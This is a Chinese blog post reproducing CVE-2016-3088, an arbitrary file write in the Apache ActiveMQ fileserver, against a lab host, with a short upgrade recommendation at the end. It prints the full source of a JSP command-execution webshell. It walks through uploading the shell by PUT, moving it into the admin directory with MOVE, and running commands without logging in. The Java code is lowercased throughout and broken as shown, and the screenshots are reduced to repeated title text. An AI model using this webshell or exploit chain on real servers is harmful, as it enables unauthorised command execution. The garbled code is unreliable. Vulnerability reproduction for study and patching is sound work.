欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

程序员文章站 2022-09-25 20:59:29
一、漏洞描述 该漏洞出现在fileserver应用中,漏洞原理:activemq中的fileserver服务允许用户通过http put方法上传文件到指定目录。files...

一、漏洞描述

该漏洞出现在fileserver应用中,漏洞原理:activemq中的fileserver服务允许用户通过http put方法上传文件到指定目录。fileserver支持写入文件(不解析jsp),但是支持移动文件(move)我们可以将jsp的文件put到fileserver下,然后再通过move指令移动到可执行目录下访问。

二、漏洞影响版本

apache activemq 5.0.0 - 5.13.2

三、漏洞环境搭建

1、官网下载apache-activemq-5.7.0-bin.tar 下载地址:http://activemq.apache.org/download-archives.html

2、解压

3、启动,进入bin目录下,运行./activemq start

  Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

4、浏览器访问http://192.168.10.149:8161/,如下图可以看到成功搭建环境

  Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

四、漏洞复现

1、put上传一个jsp的webshell到fileserver目录,下图可以看到成功上传jsp文件

jsp文件内容:

<%@ page import="java.io.*"%>
<%
 out.print("hello</br>");
 string strcmd=request.getparameter("cmd");
 string line=null;
 process p=runtime.getruntime().exec(strcmd);
 bufferedreader br=new bufferedreader(new inputstreamreader(p.getinputstream()));
 while((line=br.readline())!=null){
 out.print(line+"</br>");
 }
%>

  Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

2、浏览器访问http://192.168.10.149:8161/fileserver/1.jsp,下图可以看到fileserver目录下的webshell没有被解析,说明fileserver目录没有执行权限

  Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

3、利用该版本存在物理路径泄露漏洞,爆一下绝对路径

  Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

4、利用move方法将webshell移入admin目录下,如下图所示成功把文件移入到admin目录

  Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

5、利用该版本存在的未授权访问漏洞,不用登录,访问http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下图可以看到成功执行命令

  Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

五、漏洞防御

1、activemq fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。

---------------------------------------------------------------------------------

参考:

总结

以上所述是小编给大家介绍的apache activemq任意文件写入漏洞(cve-2016-3088)复现,希望对大家有所帮助